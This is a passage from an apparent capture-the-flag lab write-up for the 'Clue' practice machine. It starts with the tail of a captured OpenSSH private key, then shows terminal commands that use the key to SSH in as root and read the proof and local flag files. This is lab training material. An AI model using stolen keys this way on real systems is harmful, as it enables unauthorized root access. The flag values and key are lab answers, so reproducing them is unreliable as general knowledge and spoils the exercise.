Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ ssh root@clue.pg -i id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 9 13:48:17 2025 from 192.168.45.187
root@clue:~#Get the flags:
root@clue:~# cat proof_youtriedharder.txt
87a508096775a773136abfc29f3608a8
root@clue:~# find / -name local.txt -exec cat {} \;
c20f25c19ac3b83861c2457cdc569449Last updated